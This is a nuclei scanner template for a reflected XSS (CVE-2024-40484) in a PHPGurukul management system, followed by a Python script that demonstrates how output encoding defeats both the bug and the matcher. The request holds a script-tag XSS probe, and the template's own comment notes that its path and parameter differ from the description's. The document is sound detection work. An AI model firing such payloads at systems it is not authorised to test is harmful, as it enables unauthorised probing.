CVE-2024-40484.yaml
id: CVE-2024-40484

info:
  name: Reflected XSS in Old Age Home Management System v1.0
  author: ProjectDiscoveryAI
  severity: medium
  description: A Reflected Cross Site Scripting (XSS) vulnerability in "/oahms/search.php" in PHPGurukul Old Age Home Management System v1.0 allows remote attackers to execute arbitrary code via the "searchdata" parameter.
  impact: |
    Successful exploitation could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to account takeover, sensitive data theft, or further attacks.
  remediation: |
    Implement proper input validation and output encoding to prevent XSS attacks in the Old Age Home Management System v1.0.
  reference:
    - https://github.com/takekaramey/CVE_Writeup/blob/main/PHPGurukul/Old%20Age%20Home%20Mgmt%20System%20v1.0/Reflected%20XSS.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-40484
    cwe-id: CWE-79
    epss-score: 0.00046
    epss-percentile: 0.18638
    cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    vendor: phpgurukul
    product: old_age_home_management_system

http:
  # Single unauthenticated GET with a harmless probe string in the search parameter.
  # Note: the probed path and parameter name differ from those cited in the
  # description above (/oahms/search.php, searchdata); verify which applies to
  # the deployment under test.
  - method: GET
    path:
      - "{{BaseURL}}/old_age_home_mgmt_system/search.php?search_query=<script>alert('XSS')</script>"

    # The finding is reported only if the probe comes back verbatim in the
    # response body, i.e. reflected without HTML encoding. A page that encodes
    # its output (&lt;script&gt;...) does not contain this string and does not match.
    matchers:
      - type: word
        words:
          - "<script>alert('XSS')</script>"
        part: body
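The template's detection rule and the remediation it recommends are two sides of the same check: a `word` matcher on the body fires only when the probe is reflected unencoded, and output encoding is exactly what removes that reflection. The following is an added example, not part of the template or of PHPGurukul's code, that replays the template's request against two constructed stand-ins for `search.php` (the real file is not on this page): one that echoes the parameter raw and one that applies HTML output encoding. The `word_matcher` function is an assumption about nuclei's `word` matcher semantics (substring match on the chosen part, `or` across words unless `condition: and` is set); `render_search_page_vulnerable` and `render_search_page_fixed` are hypothetical.

```python
"""Replay of the CVE-2024-40484 nuclei template's check against constructed
search pages, to show why output encoding defeats both the bug and the matcher.
Added example; the page renderers below are hypothetical stand-ins, not
PHPGurukul's search.php."""
import html
from urllib.parse import parse_qs, urlsplit

# Probe string and request path taken from the template above.
PAYLOAD = "<script>alert('XSS')</script>"
TEMPLATE_PATH = (
    "/old_age_home_mgmt_system/search.php?search_query=<script>alert('XSS')</script>"
)


def render_search_page_vulnerable(query: str) -> str:
    """Hypothetical page that writes the search term into HTML without encoding
    (the CWE-79 pattern the template is looking for)."""
    return f"<html><body><h2>Results for {query}</h2></body></html>"


def render_search_page_fixed(query: str) -> str:
    """Same page with the remediation applied: HTML-encode the value before it
    is written into the document (the equivalent of PHP's htmlspecialchars with
    ENT_QUOTES). The term is still displayed, but as text, not markup."""
    return f"<html><body><h2>Results for {html.escape(query, quote=True)}</h2></body></html>"


def word_matcher(body: str, words: list[str], condition: str = "or") -> bool:
    """Assumed mirror of a nuclei `type: word` matcher on `part: body`:
    plain substring search, any word by default, every word with `and`."""
    hits = [w in body for w in words]
    return all(hits) if condition == "and" else any(hits)


def run_template_check(render, path: str = TEMPLATE_PATH) -> bool:
    """Extract the search_query value from the template's path, feed it to a
    page renderer and apply the template's matcher to the resulting body."""
    query = parse_qs(urlsplit(path).query).get("search_query", [""])[0]
    body = render(query)
    return word_matcher(body, [PAYLOAD])


if __name__ == "__main__":
    # Vulnerable stand-in: probe reflected verbatim, matcher fires.
    print("vulnerable page matched:", run_template_check(render_search_page_vulnerable))
    # Encoded stand-in: probe comes back as &lt;script&gt;..., matcher stays silent.
    print("fixed page matched:", run_template_check(render_search_page_fixed))
```

Running the script prints `True` for the raw-echo page and `False` for the encoding page, which is also a quick way to confirm a patched deployment before closing the finding: the matcher is a by-product of the missing encoding, so a correct fix makes it silent without any change to the template.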